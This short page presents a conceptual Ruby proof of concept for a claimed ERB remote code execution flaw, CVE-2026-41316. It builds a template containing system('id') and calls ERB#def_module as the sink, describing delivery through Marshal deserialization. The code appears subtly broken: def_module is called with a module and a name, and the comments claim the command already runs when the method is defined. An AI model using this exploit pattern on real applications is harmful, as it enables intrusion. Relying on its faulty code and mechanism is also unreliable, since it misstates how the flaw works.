CVE-2026-41316 Ruby ERB远程代码执行漏洞

# CVE-2026-41316 PoC (Conceptual) # This demonstrates how the missing guard in def_module can be exploited # via deserialization. require 'erb' # 1. Construct a malicious ERB template containing the payload # The code inside will be executed when def_module is called. malicious_template = ERB.new("puts 'RCE via CVE-2026-41316'; system('id')") # 2. Simulate the vulnerability trigger # In a real attack, the object would be delivered via Marshal.load. # The application logic would inadvertently call def_module. begin # Check if def_module is vulnerable (lacks @_init check) # This bypasses the protection that exists in .result puts "[*] Triggering ERB#def_module on untrusted input..." # Create a dummy module to inject the method into TargetModule = Module.new # This is the sink: calling def_module executes the template code malicious_template.def_module(TargetModule, "unsafe_method") # If successful, the system command 'id' has already run. rescue => e puts "Error: #{e.message}" end